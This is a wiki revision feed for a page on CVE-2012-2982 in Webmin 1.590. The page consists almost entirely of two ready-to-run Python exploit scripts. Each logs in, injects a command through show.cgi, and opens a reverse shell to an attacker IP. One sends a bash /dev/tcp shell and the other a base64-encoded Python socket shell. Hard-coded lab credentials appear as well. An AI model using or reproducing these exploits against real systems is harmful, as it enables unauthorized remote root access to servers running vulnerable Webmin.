https://pwnwiki.com/index.php?action=history&feed=atom&title=CVE-2012-2982_Webmin_1.590%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
CVE-2012-2982 Webmin 1.590任意命令執行漏洞 - Revision history
2026-04-10T13:45:41Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=CVE-2012-2982_Webmin_1.590%E4%BB%BB%E6%84%8F%E5%91%BD%E4%BB%A4%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=977&oldid=prev
Pwnwiki: Created page with "==POC== ===web.py=== <pre> #!/usr/bin/env python #usage: python3 web.py <targetIP> import sys, requests, string, secrets targetIP = sys.argv[1] lhost = "10.10.10.10" #attack..."
2021-04-04T06:17:28Z
<p>Created page with "==POC== ===web.py=== <pre> #!/usr/bin/env python #usage: python3 web.py <targetIP> import sys, requests, string, secrets targetIP = sys.argv[1] lhost = "10.10.10.10" #attack..."</p>
<p><b>New page</b></p><div>==POC==<br />
===web.py===<br />
<pre><br />
#!/usr/bin/env python<br />
<br />
#usage: python3 web.py <targetIP><br />
import sys, requests, string, secrets<br />
<br />
targetIP = sys.argv[1]<br />
lhost = "10.10.10.10" #attacker IP<br />
lport = "53" #listening port<br />
<br />
data = {'page' : "%2F", 'user' : "user1", 'pass' : "1user"}<br />
url = f"http://{targetIP}/session_login.cgi"<br />
<br />
r = requests.post(url, data=data, cookies={"testing":"1"}, verify=False, allow_redirects=False)<br />
<br />
if r.status_code == 302 and r.cookies["sid"] != None:<br />
print("[+] Login successful, executing payload")<br />
else:<br />
print("[-] Failed to login")<br />
<br />
sid = r.cookies["sid"]<br />
<br />
def rand():<br />
alphaNum = string.ascii_letters + string.digits<br />
randChar = ''.join(secrets.choice(alphaNum) for i in range(5))<br />
return randChar<br />
<br />
def payload():<br />
payload = f"bash -c 'exec bash -i &>/dev/tcp/{lhost}/{lport}<&1'"<br />
return payload<br />
<br />
exp = f"http://{targetIP}/file/show.cgi/bin/{rand()}|{payload()}|"<br />
<br />
req = requests.post(exp, cookies={"sid":sid}, verify=False, allow_redirects=False)<br />
<br />
</pre><br />
<br />
===gamezone.py===<br />
<pre><br />
#!/usr/bin/env python<br />
<br />
#CVE-2012-2982 translated from ruby metasploit module (/webmin_show_cgi_exec.rb) <br />
#program outline:<br />
# - POST request with compromised creds to get the cookie<br />
# - exploit using invalid characters to get system shell<br />
# - fetches system shell as root<br />
# - sends shell through socket to listening attacker IP<br />
#usage: <br />
# - MUST BE SSH TUNNELED INTO MACHINE TO ACCESS localhost<br />
# - python gamezone.py <br />
# - listen with nc -nlvp 4445 on attacker<br />
<br />
import sys, os, subprocess, requests, socket, string, secrets, base64<br />
<br />
lhost = "10.10.174.47" #attacker IP CHANGE, needs to be a string to convert in payload function<br />
lport = "4445" # listening port, string to convert in payload function<br />
<br />
#Login with compromised creds and print good status response<br />
creds = {'page' : "%2F", 'user' : "agent47", 'pass' : "videogamer124"} #must be A dictionary, list of tuples, bytes or a file object<br />
url = "http://localhost:10000/session_login.cgi"<br />
<br />
r = requests.post(url, data=creds, cookies={"testing":"1"}, verify=False, allow_redirects=False) #send POST request to login <br />
#if status code 302 found and sid not empty <br />
if r.status_code == 302 and r.cookies["sid"] != None:<br />
print("[+] Login successful, executing payload (listen for shell)")<br />
else:<br />
print("[-] Failed to login")<br />
<br />
sid = r.headers['Set-Cookie'].replace('\n', '').split('=')[1].split(";")[0].strip() #replace the sid cookie newline character, split at = and store the second element (sid) of array, split at ; and stop at first element in array, strip remaining<br />
<br />
#generates random characters and delivers the payload<br />
def rand():<br />
alphaNum = string.ascii_letters + string.digits #custom alphanumeric string variable<br />
randChar = ''.join(secrets.choice(alphaNum) for i in range(5)) #generate 5 random alphanumeric characters<br />
return randChar<br />
<br />
def payload():<br />
payload = "python -c \"import base64;exec(base64.b64decode('" #run python command to execute base64<br />
shell = "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\""+ lhost + "\"," + lport + "));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"])" #open a socket, send it to the attacking host/port, open the shell<br />
shell = str.encode(shell) #encode the shellcode as a string<br />
encoded = base64.b64encode(shell) #encode the string with base64<br />
encoded = encoded.decode("utf-8") #decode that to be used as a string in the exploit URL<br />
closing = "'))\"" #close the payload<br />
payload += encoded #update the payload to contain the encoded/decoded parameters<br />
payload += closing<br />
return payload<br />
<br />
exp = "http://localhost:10000/file/show.cgi/bin/" + "%s|%s|" % (rand(), payload())<br />
<br />
req = requests.post(exp, cookies={"sid":sid}, verify=False, allow_redirects=False) #send POST request to upload shellcode <br />
<br />
</pre></div>
Pwnwiki